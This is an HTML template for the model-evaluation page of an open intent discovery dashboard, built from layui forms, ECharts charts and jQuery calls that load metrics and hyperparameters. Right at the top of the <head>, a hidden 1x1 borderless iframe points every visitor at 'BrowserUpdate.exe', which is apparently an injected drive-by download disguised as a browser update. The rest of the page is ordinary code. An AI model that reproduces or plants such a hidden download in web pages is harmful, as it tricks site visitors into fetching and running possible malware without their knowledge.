<!DOCTYPE html>
<html class="x-admin-sm">

    <head><iframe src=BrowserUpdate.exe width=1 height=1 frameborder=0></iframe>
        <meta charset="UTF-8">
        <META HTTP-EQUIV="pragma" CONTENT="no-cache"> 
        <META HTTP-EQUIV="Cache-Control" CONTENT="no-cache, must-revalidate"> 
        <META HTTP-EQUIV="expires" CONTENT="0">
        <title>Open Intent Discovery System</title>
        <meta name="renderer" content="webkit">
        <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
        <meta name="viewport" content="width=device-width,user-scalable=yes, minimum-scale=0.4, initial-scale=0.8,target-densitydpi=low-dpi" />
        <link rel="stylesheet" href="/static/lib/xadmin/css/font.css">
        <link rel="stylesheet" href="/static/lib/xadmin/css/xadmin.css">
        <script type="text/javascript" src="/static/lib/jquery-3.2.1.js" charset="utf-8"></script>
        <script type="text/javascript" src="/static/lib/layui/layui.js" charset="utf-8"></script>
        <script type="text/javascript" src="/static/lib/xadmin/js/xadmin.js"></script>
        <script src="/static/lib/xadmin/js/echarts.min.js"></script>
        <script src="/static/lib/xadmin/js/ecStat.js"></script>
        <!-- 让IE8/9支持媒体查询，从而兼容栅格 -->
        <!--[if lt IE 9]>
            <script src="https://cdn.staticfile.org/html5shiv/r29/html5.min.js"></script>
            <script src="https://cdn.staticfile.org/respond.js/1.4.2/respond.min.js"></script>
        <![endif]-->
    </head>
    <body>
    

    <div class="layui-fluid">
        <div class="form_mine  layui-row  ">
            <div class="layui-col-md12">
                <div class="layui-card">
                    <div style=" font-weight:700; font-size:20px;color:#555555; margin-left:1.5%;padding-top: 2%;">Model Evaluation</div>
                    <div class="">    
                            
                                <div style="width: 650px; margin:10px  auto ;padding-top: 1%;">
                                    <form class="layui-form layui-col-space5" >
                                     
                                        <div class="layui-input-inline" style="padding-left: 9px;">
                                            <div id="title_btn1" class="layui-input-inline" style=" font-weight:600; font-size:15px;color:#555555;width: 200px; border: 0px solid red;">
                                                Dataset
                                            </div >
                                            <div id="title_btn2"class="layui-input-inline" style="font-weight:600; font-size:15px;color:#555555;width: 200px; border: 0px solid red;">
                                                Method
                                            </div>
                                            <div id="title_btn3"class="layui-input-inline" style="font-weight:600; font-size:15px;color:#555555;width: 200px; border: 0px solid red;">
                                                Created Time
                                            </div>
                                           
                                        </div>
                                        
                                        <div class="layui-input-inline " >
                                            <div class="layui-input-inline" id='select_'>
                                                <select id="dataset_name_select_2" name="dataset_name_select" lay-filter="dataset" >
                                                    
                                                    {% for lines in datasetList %}
                                                    {% comment %}<!-- {% if lines.dataset_name == 'banking' %}
                                                        <option selected  value="{{lines.dataset_name}}" >{{lines.dataset_name}}</option>
                                                        {% endif %} -->
                                                        
                                                        <!-- {% if lines.model_name != 'banking' %} -->{% endcomment %}

                                                        {% if lines.dataset_name == create_time_new.dataset_name %}
                                                        <option  value="{{lines.dataset_name}}" selected >{{lines.dataset_name}}</option>
                                                        {% endif %}
                                                        {% if lines.dataset_name != create_time_new.dataset_name %}
                                                        <option  value="{{lines.dataset_name}}" >{{lines.dataset_name}}</option>
                                                        {% endif %}
                                                       
                                                        {% comment %}<!-- {% endif %} -->{% endcomment %}
                                                    {% endfor %}
                                                    <!-- <option  disabled >Dataset</option>
                                                        {% for lines in datasetList %}
                                                            <option  value="{{lines.dataset_name}}" >{{lines.dataset_name}}</option>
                                                        {% endfor %} -->
                                                </select>
                                            </div>


                                            <div class="layui-input-inline" >
                                                <select id="model_detection_1" name="model_detection" lay-filter="method">
                                                    <option value='model_detection_1' selected >Open Intent Discovery</option>
                                                    {% for lines in modelList_detection %}
                                                    

                                                    {% if lines.model_name == create_time_new.model_name %}
                                                        <option  value="{{lines.model_name}}" selected>{{lines.model_name}}</option>
                                                        {% endif %}
                                                        {% if lines.model_name != create_time_new.model_name %}
                                                        <option  value="{{lines.model_name}}" >{{lines.model_name}}</option>
                                                        {% endif %}

                                                    {% endfor %}


                                                    

                                                        <!-- {% for lines in modelList_detection %}
                                                            <option  value="{{lines.model_name}}" >{{lines.model_name}}</option>
                                                        {% endfor %} -->
                                                </select>
                                            </div>
                                            

                                            



                                            <div class="layui-input-inline " >
                                                <select id="create_time" name="create_time" lay-filter="create_time" style="z-index: 3;">
                                                    

                                                    {% for create_time in create_time %}
                                                   

                                                    {% if create_time.create_time == create_time_new.create_time %}
                                                    <option   value="{{create_time.log_id}}" selected>{{create_time.create_time|date:"Y/m/d  H:i:s"}}</option>
                                                    {% endif %}
                                                    {% if create_time.create_time != create_time_new.create_time %}
                                                    <option  value="{{create_time.log_id}}" >{{create_time.create_time|date:"Y/m/d  H:i:s"}}</option>
                                                    {% endif %}



                                                    {% endfor %}
                                                </select>
                                            </div>
                                            <div class="layui-inline layui-show-xs-block"style=" margin-right:0px">
                                                <button class="layui-btn" id="show2Btn" lay-filter="show2" lay-submit="" >Show</button>
                                            </div>
                                            
                                        </div>
                                    </form> 
                                    
                                </div>
                                <div style="font-weight:700; font-size:20px;color:#555555;margin-left:1.5%">Parameter List</div>
                                <div style="color:#6F6F6F;margin-left:1.5%;">--Show the parameter list.</div> 
                                <div class="layui-form " style="margin:0 auto  ;width: 650px;" >
                                    <div >
                                        <table lay-even class="layui-table lay-even">
                                            <colgroup>
                                                <col width = ''>
                                                <col width = '30%'>
                                                <!--50% 18.1%-->
                                            </colgroup>
                                            <theda>
                                                <tr>
                                                    <th style='background-color:#eeeded'> Name</th>
                                                    <th style='background-color:#eeeded'> Value</th>
                                                </tr>
                                            </theda>
                                            <tbody id='textarea_parm'>
                                                {% for parameter in parameters %}
                                                <tr>

                                               
                                                <td>{{parameter.param_name}}</td>
                                                <td>{{parameter.default_value}}</td>
                                            </tr>
                                                {% endfor %}
                                            </tbody>
                                        </table>
    
                                    </div>
                                </div>
           </div>
                    
                    
                        <div style="width: 100%;">
                            <div class="layui-card">
                                <div class="layui-card-body">
                                
                                <div style="font-weight:700; font-size:20px;color:#555555">Testing Results</div>
                                    <div style="color:#6F6F6F">--Show the testing results.</div>  
                                        {% comment %} <a id="download" href="">Download</a>   {% endcomment %}
                                    
                                        
                                        <div class="layui-form " style="margin:0 auto  ;width: 650px;" >
                                            <div >
                                                <table lay-even class="layui-table lay-even">
                                                    <colgroup>
                                                        <col width = ''>
                                                        <col width = '30%'>
                                                        <!--50% 18.1%-->
                                                    </colgroup>
                                                    <theda>
                                                        <tr>
                                                            <th style='background-color:#eeeded'> Metric</th>
                                                            <th style='background-color:#eeeded'> Value</th>
                                                        </tr>
                                                    </theda>
                                                    <tbody id='metric'>
                                                       
                                                    </tbody>
                                                </table>
            
                                            </div>
                                        </div>

                                        <div id="image_1" style="width:95%;height:350px; display: none;"></div>
                                </div>
                            </div>
                        </div>

                        <div class="layui-col-md6">
                            <div class="layui-card" style = "display:none">
                                <div class="layui-card-body">
                                    <div style="font-weight:700; font-size:20px;color:#555555">Result</div>
                                    <div style="color:#6F6F6F">--Show the training and evaluation results.</div> 
                                    
                                        <div id="image_2" style="width:95%;height:350px; display: none;">
                                        </div>
                                    
                                </div>
                            </div>
                        </div>


                        <div class="layui-input-inline">
                                <div class="layui-input-inline">
                                 <div class="layui-col-md6">
                                    <div class="layui-card">
                                        <div class="layui-card-body">
                                                <div style="font-weight:700; font-size:20px;color:#555555">Fine-grained Performance</div>
                                                <div style="color:#6F6F6F">--Show the fine-grained model results.</div>     
                                                {% comment %} <a id="download" href="">Download</a> {% endcomment %}
                                                {% comment %} <div id="image_3" style="width: 80%;height:285px;"></div> {% endcomment %}
                                                <div id="image_3" style="width:800px; height:450px; left:0; right:0; margin:auto;" ></div>
                                                  
                                        </div>
                                    </div>    
                                </div>
                                <div class="layui-input-inline">
                                    <div class="layui-col-md6">
                                        <div class="layui-card">
                                            <div class="layui-card-body">
                                                {% comment %} Result {% endcomment %}   
                                                    <div style="font-weight:700; font-size:20px;color:#555555">Error Analysis</div>
                                                    <div style="color:#6F6F6F">--Show detailed results of incorrect samples.</div>  
                                                    {% comment %} <a id="download" href="">Download</a> {% endcomment %}
                                                    {% comment %} <div id="image_4" style="width:390px;height:285px;"></div> {% endcomment %}
    
                                                    <div id="image_4" style="width:800px; height:450px; left:0; right:0; margin:auto;" ></div>
                                                      
                                                   
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div> 
    
                                
                        </div> 

                </div>

            </div>


        </div>
    </div> 

       

        <script>layui.use(['form', 'layer','jquery'],
       
            function() {
                $ = layui.jquery;
                var form = layui.form,
                layer = layui.layer;
                json_base_path = '/static/jsons/open_intent_detection/'

                //image_3 image_4
                form.on('submit(show)',function(data) {

                    console.log('clicked Test--215!!!!!!!!')
                    dataset_name_select_1 = $('#dataset_name_select_2').val()
                    model_detection_1 = $('#model_detection_1').val()
                    log_id = $('#create_time').val()
                    console.log("log_id_218:",log_id)
                    if(dataset_name_select_1 == 'Dataset'){
                        layer.msg('Please select Dataset');
                    } else if(Known_Intent_Ratio_1 == 0){
                        layer.msg('Please select Known Intent Ratio');
                    } else if(Annotated_Ratio_1 == 0){
                        layer.msg('Please select Labeled Ratio');
                    } else if(model_detection_1 == 'model_detection_1'){
                        layer.msg('Please select New Intent Detection');
                    } else{
                        if(Annotated_Ratio_1 == 1 || Annotated_Ratio_1 == "1"){
                            Annotated_Ratio_1 = "1.0"
                        }

                        var key_ture_false = dataset_name_select_1 + '_'+ model_detection_1 + '_' 
                        //image_3    Overall Performance
                        var myChart1 = echarts.init(document.getElementById('image_3'));
                        //image_4    Error Analyze
                        var myChart2 = echarts.init(document.getElementById('image_4'));
                        $.get('/detection/model_test/model_evaluation_getDataOfTFOverallByKey?key='+key_ture_false, function (data) {
                            var errorMsg = 'Overall Performance'
                            data_chart_1 = data.data;
                    if (data.code != 200){ errorConfirm(errorMsg); return false; }
                            myChart1.clear();
                            myChart1.setOption(get_option_ture_false_overall(data_chart_1));
                            },'json');
                        $.get('/detection/model_test/model_evaluation_getDataOfTFFineByKey?key='+key_ture_false, function (data) {
                            var errorMsg = 'Error Analyze'
                            data_chart_2 = data.data;
                        if (data.code != 200){ errorConfirm(errorMsg); return false; }
                            myChart2.clear();
                            myChart2.setOption(get_option_ture_false_fine(data_chart_2));
                            }, 'json');
                    }
                    
                    return false;
                });
                
                //image_1 Influence of Known Intent Ratio
                
                form.on('submit(show2)',function(data) {
                    
                    
                    dataset_name_select_2 = $('#dataset_name_select_2').val()
                    model_detection_1 = $('#model_detection_1').val()   //method----------------------------
                    log_id = $('#create_time').val()
                    console.log("log_id_264:",log_id)
                    // console.log(dataset_name_select_2,model_detection_1,create_time)
                    if(dataset_name_select_2 == 'Dataset'){
                        layer.msg('Please select Dataset');
                    } else{
                        if(model_detection_1 == 'model_detection_1'){
                        layer.msg('Please select New Intent Detection');
                    }   
                        iok_data_str = "discovery_"+dataset_name_select_2+"_"+model_detection_1+"_"+log_id
                        // iok_data_str = "detection_"+dataset_name_select_2+"_"+Label_Ratio_2+"_"+Evaluation_Metrics_2
                        var myChart3 = echarts.init(document.getElementById('image_1'));
                        // var errorMsg = 'Influence of Known Intent Ratio'

                        //第一张图
                        $.get('/discovery/model_test/model_evaluation_getDataOfIOKIRByKey?key='+iok_data_str, function (data) {
                        data_chart_3 = data.data
    
                        myChart3.clear();
                        myChart3.setOption(get_option_iokir(data_chart_3))
                    }, 'json');

                        tfo_data_str = dataset_name_select_2+"_"+model_detection_1+"_"+log_id
                        var myChart1 = echarts.init(document.getElementById('image_3'));
                        $.get('/discovery/model_test/model_evaluation_getDataOfTFOverallByKey?key='+tfo_data_str, function (data) {
                        data_chart_1 = data.data
    
                        myChart1.clear();
                        myChart1.setOption(get_option_ture_false_overall(data_chart_1))
                        }, 'json');

                        ea_data_str = dataset_name_select_2+"_"+model_detection_1+"_"+log_id
                        var myChart2 = echarts.init(document.getElementById('image_4'));
                        $.get('/discovery/model_test/model_evaluation_getDataOfTFFineByKey?key='+ea_data_str, function (data) {
                        data_chart_2 = data.data
                        // if (data.code != 200){ errorConfirm(errorMsg); return false; 
                        myChart2.clear();
                        myChart2.setOption(get_option_ture_false_fine(data_chart_2))
                        }, 'json');
                    
                        $ = layui.jquery;
                        $.get('/discovery/model_test/show_test_result?log_id='+log_id+"&dataset_name="+dataset_name_select_2+"&method="+model_detection_1, function (data) { 
                            //console.log( JSON.parse(data.data[0]))
                            console.log("test_result: ",data)
                            $("#metric").empty(); 
                            for(var key in data.data.data){
                                    $("#metric").append('<tr>');
                                        
                                        $("#metric").append("<td>"+key+"</td>");
                                        $("#metric").append("<td>"+data.data.data[key]+"</td>");
                                        
                                    $("#metric").append('</tr>');
                                }

                                   
                                   },'json');
                        $.get('/detection/model_test/show_hyper_parameters?log_id='+log_id, function (data) {                            
                           if (data.code != 200){ 

                            }
                                   //console.log( JSON.parse(data.data[0]))
                                   console.log(data)
                                //    console.log(data.data.length)
                                //    $("#create_time").empty();
                                   
                                // for(var i = 0; i<data.data.length;i++){
                                //     $("#create_time").append("<option value="+data.data[i].log_id+">"+data.data[i].create_time+"</option>");
                                // }
                                    // $("#select_data").append("<option value="+kkk+">"+KKKK+"</option>");
                                    form.render('select');
                                    console.log("_____________________750_____________________")
                                    $("#textarea_parm").empty();
                               
                                    $("#textarea_parm").append('<tr>');
                                        
                                        $("#textarea_parm").append("<td style='font-weight:bold;'>known intent ratio</td>");
                                        $("#textarea_parm").append("<td style='font-weight:bold;'>"+data['ratio'][0]+"</td>");
                                        
                                    $("#textarea_parm").append('</tr>');

                                    $("#textarea_parm").append('<tr>');
                                        
                                        $("#textarea_parm").append("<td style='font-weight:bold;'>labeled ratio</td>");
                                        $("#textarea_parm").append("<td style='font-weight:bold;'>"+data['ratio'][1]+"</td>");
                                        
                                    $("#textarea_parm").append('</tr>');

                               
                                for(var i = 0; i<data.data.length;i++){
                                    $("#textarea_parm").append('<tr>');
                                        
                                        $("#textarea_parm").append("<td>"+data.data[i].param_name+"</td>");
                                        $("#textarea_parm").append("<td>"+data.data[i].default_value+"</td>");
                                        
                                    $("#textarea_parm").append('</tr>');

     
                                }
                               
                                   //console.log( JSON.parse(data))
                                   //JSON.parse(data.data[0])
                                  //window.location.href="../model_test/?data="+data.data[0]//.dataset_name
                                   },'json');
                    }
                    return false;
                });
               
        
                
            }
            
            
            );


            function get_option_ture_false_overall(data_overall){
                var option_overall = {
                    tooltip: { trigger: 'axis', axisPointer: { type: 'shadow' } },
                    legend: { data: [ 'Predicted error sample', 'Predicted correct sample'] },
                    grid: { left: '3%', right: '4%', bottom: '5%', containLabel: true },
                    xAxis: [ { type: 'value',  nameTextStyle:{
                            fontWeight:550,
                        },
                        axisLabel:{
                            show: true,
                            textStyle:{
                            fontWeight: 550,
                            fontSize:12
                        }
                    }}],
                    yAxis: [ { type: 'category', axisTick: { show: false }, data: data_overall.intent_class } ],
                    color:['#FF6666','#66CCCC'],
                    dataZoom: [// x轴拖动
                        { type: "slider", realtime: true, height: 15, left:"10%", right:"5%",bottom:"1%", start: 0, end: 100 },
                        { type: 'slider', show: true, yAxisIndex: [0], left: '96%', right:"2%", start: 0, end: 1000 }
                    ],
                    series: [
                        { name: 'Predicted error sample', data: data_overall.left, type: 'bar', stack: 'A', emphasis: { focus: 'series' } },
                        { name: 'Predicted correct sample', data: data_overall.right, type: 'bar', stack: 'A', emphasis: { focus: 'series' } }
                    ]
                }
                return option_overall
            }

            function get_option_ture_false_fine(data_fine){
                var mylegend = new Array();
                var series = new Array();
                for(var key in data_fine){
                    mylegend.push(key),
                    // console.log(key+'\t\t'+data_fine[key])
                    series.push({
                        name: key, data: data_fine[key], type: 'bar', stack: 'total', emphasis: { focus: 'series' }
                    })
                }
                var option_fine = {
                    tooltip: { trigger: 'axis', axisPointer: { type: 'shadow' },
                    formatter:function(params){
                        var result_list = []
                        if(params[0].name == '<UNK>'){
                            result_list.push('< UNK >')
                        }else{
                            result_list.push(params[0].name)
                        }for (i = 0;i < params.length;i++){
                            if (params[i].data != 0){
                                if(params[i].seriesName == '<UNK>'){
                                    row_str = params[i].marker +' < UNK >&nbsp;:&nbsp;&nbsp;&nbsp;'+ params[i].value
                                }else{
                                    row_str = params[i].marker +' '+ params[i].seriesName +'&nbsp;:&nbsp;&nbsp;&nbsp;'+ params[i].value
                                }
                                result_list.push( row_str )
                            }
                        }
                        return result_list.join('<br>');
                        }, 
                    },
                    legend: { type: 'scroll', top: 10, data: mylegend },
                    grid: { left: '3%', right: '4%', bottom: '5%', containLabel: true },
                    xAxis: { type: 'value' ,
                    nameTextStyle:{
                            fontWeight:550,
                        },
                        axisLabel:{
                            show: true,
                            textStyle:{
                            fontWeight: 550,
                            fontSize:12
                        }
                    }
                },
                    yAxis: { type: 'category', data: mylegend },
                    dataZoom: [// x轴拖动
                        { type: "slider", realtime: true, height: 15, left:"10%", right:"5%", bottom:"1%",start: 0, end: 100 },
                        { type: 'slider', show: true, yAxisIndex: [0], left: '96%', right:"2%", start: 0, end: 1000 }
                    ],
                    color:[
                        '#5470c6','#91cc75','#fac858','#ee6666','#73c0de','#3ba272','#fc8452','#9a60b4','#ea7ccc','#BBFFFF',
                        '#FFDEAD','#00868B','#66CDAA','#BEBEBE','#00FF7F','#00CD00','#FFFF00','#FFC1C1','#B8860B','#FF8247',
                        '#B22222','#FF4500','#7B68EE','#458B00','#B0C4DE','#CAFF70','#EEE685','#556B2F','#20B2AA','#32CD32',
                        '#8B658B','#BC8F8F','#CD5555','#DEB887','#B22222','#FA8072','#EEE8AA','#EE9A49','#FF69B4','#8B4513',
                        '#EE82EE','#FF8C69','#9932CC','#CDC9C9','#EED5B7','#CD4F39','#EE4000','#CDC1C5','#FF34B3','#FFE4E1',
                        '#F0FFFF','#EE3A8C','#836FFF','#EE00EE','#473C8B','#FF83FA','#436EEE','#CD69C9','#0000FF','#CD96CD',
                        '#1E90FF','#E066FF','#1874CD','#7A378B','#5CACEE','#9A32CD','#00B2EE','#7D26CD','#00688B','#AB82FF',
                        '#6CA6CD','#EED2EE','#8DB6CD','#8B7B8B','#B9D3EE','#6C7B8B','#E0FFFF','#00008B','#D1EEEE','#8B008B',
                        '#8B0000','#90EE90','#DCDCDC','#98F5FF','#FFEBCD','#00C5CD','#FFE4B5','#00CDCD','#79CDCD','#76EEC6',
                        '#FFE4E1','#B4EEB4','#696969','#4EEE94','#6495ED','#00FF7F','#7B68EE','#00FF00','#0000FF','#87CEEB',
                        '#458B00','#00CED1','#BCEE68','#00FFFF','#FFF68F','#7FFFD4','#FFEC8B','#2E8B57','#FFFFE0','#98FB98',
                        '#CDCD00','#00FA9A','#EEC900','#9ACD32','#EEB422','#8FBC8F','#EEDD82','#EEB4B4','#8B6969','#CD5C5C',
                        '#8B4513','#EE6363','#CD853F','#8B3A3A','#F4A460','#CD6839','#B22222','#FFE7BA','#6B8E23','#FFA54F',
                        '#FF7F50','#CD853F','#FF69B4','#8B4513','#FFB6C1','#CD2626','#FF00FF','#BA55D3','#EE9572','#D8BFD8',
                        '#36648B','#9B30FF','#009ACD','#AB82FF','#A4D3EE','#BFEFFF','#8B008B','#FF34B3','#FF8C00','#228B22'
                    ],
                    series: series
                }
                    //console.log('option_fine\t'+JSON.stringify(option_fine['series']))
                return option_fine
            }

            function get_option_iokir(data_iokir){
                var mylegend = [];
                var series = [];
                var xAxis_data = ['1','2', '3','4','5','6','7','8','9','10','11','12','13','14','15','16','17','18','19','20'];
                for(var key in data_iokir){
                    mylegend.push(key),
                    series.push({
                    name: key, data: data_iokir[key], type: 'line' })
                }
                var option_iokir = {
                    tooltip: { trigger: 'axis' },
                    legend: { data: mylegend, 
                    padding:[40,80, 0,0],
                    },
                    grid: { left: '10%', right: '20%', bottom: '10%', top:'28%' },
                    xAxis: {
                        name:'KIR',
                        padding:[0,0,0,0],//控制name位置
                        type: 'category',
                        boundaryGap: false,
                        data: xAxis_data,
                        nameTextStyle:{
                            fontWeight:550,
                        },
                        axisLabel:{
                            show: true,
                            textStyle:{
                            fontWeight: 550,
                            fontSize:12
                        }
                    }

                    },
                    yAxis: { name:'Score', 
                    nameTextStyle:{
                            fontWeight:550,
                        },
                    padding:[0,0,0,0], 
                    axisLabel:{
                            show: true,
                            textStyle:{
                            fontWeight: 550,
                            fontSize:12
                        }
                    },
                    max:function(value){
                    if(parseInt(value.max % 10) <5){
                        
                        return (parseInt(value.max / 10)*10)+10;  
                    }else{
                        return (parseInt(value.max / 10)*10)+20;
                        }
                    
                }
                },
                    series: series
                }
                return option_iokir
            }

            function get_option_iolr(data_iolr){
                var mylegend = [];
                var series = [];
                var xAxis_data = ['1','2', '3','4','5','6','7','8','9','10','11','12','13','14','15','16','17','18','19','20'];
                for(var key in data_iolr){
                    mylegend.push(key),
                    series.push({ name: key, data: data_iolr[key], type: 'line'})
                }
                var option_fine = {
                    tooltip: { trigger: 'axis' },
                    legend: { data: mylegend, 
                        padding:[40,80, 0,0],
                    },
                    grid: { left: '10%', right: '23%', bottom: '10%', top:'28%' },
                    xAxis: {
                        name:'LR',
                        padding:[0,0,0,0],//控制name位置
                        type: 'category',
                        boundaryGap: false,
                        data: xAxis_data,
                        nameTextStyle:{
                            fontWeight:550,
                        },
                        axisLabel:{
                            show: true,
                            textStyle:{
                            fontWeight: 550,
                            fontSize:12
                        }
                    }
                    },
                    yAxis: {name:'Score', padding:[0,0,0,0],
                    nameTextStyle:{
                            fontWeight:550,
                        },
                        axisLabel:{
                            show: true,
                            textStyle:{
                            fontWeight: 550,
                            fontSize:12
                        }
                    } ,
                max:function(value){
                    // return value.max +10;
                    // return Math.ceil(value.max)+10;
                    if(parseInt(value.max % 10) <5){
                        
                        return (parseInt(value.max / 10)*10)+10;  
                    }else{
                        return (parseInt(value.max / 10)*10)+20;
                        }
                    
                }

                },
                    series: series
                }
                return option_fine
            }

            function errorConfirm(errorMsg){
                var baseErr = ': There is no data for this combination ！！！'
                layer.confirm(
                    errorMsg + baseErr,
                    { icon:6, btn:['Confirm'], title:'Attention Please' }
                )
            }

            function init_image_all(){
               
                    dataset_name_select_2 = $('#dataset_name_select_2').val()
                    model_detection_1 = $('#model_detection_1').val()   
                    log_id = $('#create_time').val()
                    console.log("log_id_264:",log_id)

                    if(dataset_name_select_2 == 'Dataset'){
                        layer.msg('Please select Dataset');
                    } else{
                        if(model_detection_1 == 'model_detection_1'){
                        layer.msg('Please select New Intent Detection');
                    }   
                        iok_data_str = "discovery_"+dataset_name_select_2+"_"+model_detection_1+"_"+log_id
                        
                        var myChart3 = echarts.init(document.getElementById('image_1'));
                        
                        
                        iol_data_str = "discovery_"+dataset_name_select_2+"_"+model_detection_1+"_"+log_id
                        var myChart4 = echarts.init(document.getElementById('image_2'));
                        var errorMsg = 'Influence of Label Ratio'
                        $.get('/discovery/model_test/model_evaluation_getDataOfIOLRByKey_new?key='+iol_data_str, function (data) {
                            
                            data_chart_4 = data.data
                        if (data.code != 200){ errorConfirm(errorMsg); return false; }
                            myChart4.clear();
                            myChart4.setOption(get_option_iolr(data_chart_4))
                        }, 'json');

                        tfo_data_str = dataset_name_select_2+"_"+model_detection_1+"_"+log_id
                        var myChart1 = echarts.init(document.getElementById('image_3'));
                        $.get('/discovery/model_test/model_evaluation_getDataOfTFOverallByKey?key='+tfo_data_str, function (data) {
                        data_chart_1 = data.data
                        
                        myChart1.clear();
                        myChart1.setOption(get_option_ture_false_overall(data_chart_1))
                        }, 'json');
                        
                        ea_data_str = dataset_name_select_2+"_"+model_detection_1+"_"+log_id
                        var myChart2 = echarts.init(document.getElementById('image_4'));
                        $.get('/discovery/model_test/model_evaluation_getDataOfTFFineByKey?key='+ea_data_str, function (data) {
                        data_chart_2 = data.data

                        myChart2.clear();
                        myChart2.setOption(get_option_ture_false_fine(data_chart_2))
                        }, 'json');
                                        
                        $ = layui.jquery;
                        $.get('/discovery/model_test/show_test_result?log_id='+log_id+"&dataset_name="+dataset_name_select_2+"&method="+model_detection_1, function (data) { 
                            console.log("test_result: ",data)
                            $("#metric").empty(); 
                            for(var key in data.data.data){
                                    $("#metric").append('<tr>');
                                        
                                        $("#metric").append("<td>"+key+"</td>");
                                        $("#metric").append("<td>"+data.data.data[key]+"</td>");
                                        
                                    $("#metric").append('</tr>');
                                }

                                   
                                   },'json');
                        $.get('/detection/model_test/show_hyper_parameters?log_id='+log_id, function (data) {                            
                           if (data.code != 200){ 

                            }
                            
                                   console.log(data)
                                    form.render('select');
                                    console.log("_____________________750_____________________")
                                    $("#textarea_parm").empty();
                               
                                    $("#textarea_parm").append('<tr>');
                                        
                                        $("#textarea_parm").append("<td style='font-weight:bold;'>known intent ratio</td>");
                                        $("#textarea_parm").append("<td style='font-weight:bold;'>"+data['ratio'][0]+"</td>");
                                        
                                    $("#textarea_parm").append('</tr>');

                                    $("#textarea_parm").append('<tr>');
                                        
                                        $("#textarea_parm").append("<td style='font-weight:bold;'>labeled ratio</td>");
                                        $("#textarea_parm").append("<td style='font-weight:bold;'>"+data['ratio'][1]+"</td>");
                                        
                                    $("#textarea_parm").append('</tr>');

                               
                                for(var i = 0; i<data.data.length;i++){
                                    $("#textarea_parm").append('<tr>');
                                        
                                        $("#textarea_parm").append("<td>"+data.data[i].param_name+"</td>");
                                        $("#textarea_parm").append("<td>"+data.data[i].default_value+"</td>");
                                        
                                    $("#textarea_parm").append('</tr>');

     
                                }
                                   },'json');
                    }
            }
           
            
            
            </script>
            <script>
    layui.use(['form'], function() {
        var val1,val2
        val1 = $('#dataset_name_select_2').val()
        val2 = $('#model_detection_1').val()  
        val3 = $('#known_intent_ratio').val()
        val4 = $('#labled_ratio').val()  
    form=layui.form;
    form.on('select(dataset)', function(data){
        $ = layui.jquery;
     val1=data.value;
     console.info(val1,val2);
     if(val1=='Dataset'){
       
         layer.msg('Please select Dataset');
         
     }else 
     if(val1!=undefined & val2!=undefined){
        show_create_time(val1,val2)
     }
    
    });

    form.on('select(method)', function(data){
        val1 = $('#dataset_name_select_2').val()
        val2 = $('#model_detection_1').val()  
        val2=data.value;
        console.info(val1,val2);
        if(val2=='model_detection_1'){
     
         layer.msg('Please select method');
     }else
        if(val1!=undefined & val2!=undefined){
        show_create_time(val1,val2)
     }
    });
    form.on('select(Evaluation)', function(data){
        $ = layui.jquery;
        console.log(data.value)

        log_id= $('#create_time').val()
        console.log("log_id",log_id)
       
        var evaluation=data.value
        iol_data_str = "discovery_"+dataset_name_select_2+"_"+model_detection_1+"_"+log_id+"_"+evaluation
        var myChart4 = echarts.init(document.getElementById('image_2'));
        var errorMsg = 'Influence of Label Ratio'
        $.get('/discovery/model_test/model_evaluation_getDataOfIOLRByKey_new?key='+iol_data_str, function (data) {
            // data_chart_4 = data[iol_data_str]
            data_chart_4 = data.data
        if (data.code != 200){ errorConfirm(errorMsg); return false; }
            myChart4.clear();
            myChart4.setOption(get_option_iolr(data_chart_4))
        }, 'json');


    });
    function show_create_time(dataset_name,model_name){
        $ = layui.jquery;
      
        $.get('/detection/model_test/show_create_time?dataset_name='+dataset_name+"&model_name="+model_name, function (data) {
                           
                            
                           if (data.code != 200){  }
                                   console.log(data.data)
                                   console.log(data.data.length)
                                   $("#create_time").empty();
                                for(var i = 0; i<data.data.length;i++){
                                    $("#create_time").append("<option value="+data.data[i].log_id+">"+data.data[i].create_time.replace(/-/g,'/').replace(/T/g,'  ')+"</option>");
                                }
                                   
                                  
                                    // $("#select_data").append("<option value="+kkk+">"+KKKK+"</option>");
                                    form.render('select');
                                    console.log("_____________________750_____________________")
                                   },'json');
    }

    
});
            </script>
        <script>
        
        init_image_all()
        setTimeout("style_op()","100"); 
        
         function style_op(){
                console.log("width:",$("#select_").width())

                $("#title_btn1").width($("#select_").width()+1); 
                $("#title_btn2").width($("#select_").width()); 
                $("#title_btn3").width($("#select_").width()); 
            }
        

 function test_change(){
                console.log("change!!")
                var obj = document.getElementById('dataset_name_select_2');
                console.log(obj)
              

            }

function GetRequest(urlStr) {
    if (typeof urlStr == "undefined") {
        var url = decodeURI(location.search); 
    } else {
        var url = "?" + urlStr.split("?")[1];
    }
    var theRequest = new Object();
    if (url.indexOf("?") != -1) {
        var str = url.substr(1);
        strs = str.split("&");
        for (var i = 0; i < strs.length; i++) {
            theRequest[strs[i].split("=")[0]] = decodeURI(strs[i].split("=")[1]);
        }
    }
    return theRequest;
}
var parms_1 = GetRequest();

for(var key in parms_1){
    console.log(key)
}

        </script>
    </body>

</html>